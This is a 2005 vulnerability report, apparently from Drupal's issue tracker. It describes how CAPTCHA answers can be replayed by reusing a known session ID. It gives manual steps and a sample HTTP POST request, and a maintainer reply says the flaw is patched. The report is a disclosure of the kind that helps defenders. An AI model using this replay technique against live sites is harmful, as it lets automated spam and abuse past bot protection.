Most CAPTCHAs don't destroy the session when the correct phrase is entered. So by reusing the session id of a known CAPTCHA image, it is possible to automate requests to a CAPTCHA-protected page.
I have tested a number of free and commercial CAPTCHA scripts, and most of them are vulnerable to this method of exploitation. This includes the popular humanVerify solution, and many others.
manual steps:
connect to captcha page
record session ID and captcha plaintext
automated steps:
resend session ID and CAPTCHA plaintext any number of times, changing the user data, eg:
POST /vuln_script.php HTTP/1.0
Cookie: PHPSESSID=329847239847238947;
^^^ this is the session id of the page you looked at manually
Content-Length: 49
Connection: close;
name=bob&email=bob@fish.com&captcha=the_plaintext
^^^ this includes the captcha string for the page you looked at manually
The Drupal Captcha is vunerable
tested in July 7th, 2005
------------------------------------------
Reference: http://www.puremango.co.uk/cm_breaking_captcha_115.php
Comments
Comment #1
arnabdotorg CreditAttribution: arnabdotorg commentedThanks for the heads up; patched and fixed for cvs, 4.6 and 4.5
-Arnab
Comment #2
(not verified) CreditAttribution: commentedComment #3
(not verified) CreditAttribution: commentedComment #4
(not verified) CreditAttribution: commentedComment #5
(not verified) CreditAttribution: commentedComment #6
(not verified) CreditAttribution: commentedComment #7
(not verified) CreditAttribution: commented